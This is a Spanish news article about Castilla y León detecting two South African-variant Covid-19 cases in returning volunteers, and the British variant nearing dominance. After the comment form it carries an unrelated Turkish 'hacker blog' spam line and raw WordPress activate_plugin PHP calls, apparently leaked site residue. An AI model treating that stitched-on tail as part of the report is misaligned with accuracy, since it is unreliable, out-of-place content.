Castilla y León detecta dos casos de Covid de la variante sudafricana



I. J.VALLADOLID
Actualizado:23/02/2021 13:41h
Guardar
Noticias relacionadas

La consejera de Sanidad de Castilla y León, Verónica Casado, ha confirmado este martes que se han confirmado dos casos de la variante sudafrica del Covid-19 en la Comunidad. Ha sido, según ha señalado, en dos personas que habían retornado de Tanzania, donde habían estado realizando labores de voluntariado.

Casado ha destacado que la «ágil» labor detección y análisis han permitido actuar de forma rápida para cuarentenar a los infectados y hacer los rastreos de sus contactos, que también están en aislamiento.

Ambos pacientes están «controlados» y con sintomatología leve. Pertenecen a una ONG y están en Valladolid.

Según esos datos, uno de los infectados por la variante sudafricana había tenido un contacto estrecto con una persona de fuera de Castilla y León, mientras que el otro ha comunicado tres contactos estrechos. Los tres, residentes en la Comunidad, a quienes ya se ha realizado la primera prueba de detección del virus PCR que ha sido negativa, aunque se mantienen en cuarentena a la espera de que trascurra el tiempo y someterles a uno nuevo test.

Por otra parte, Casado ha señalado que la variante británica está detrás del 64 por ciento de los casos y todo apunta a que «en breve» puede ser la «dominante» del Covid. Esto puede «explicar», ha señalado, por qué en algunas zonas ha habido más contagios y también se han dado en personas más jóvenes.

Ver los
comentariosTemas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );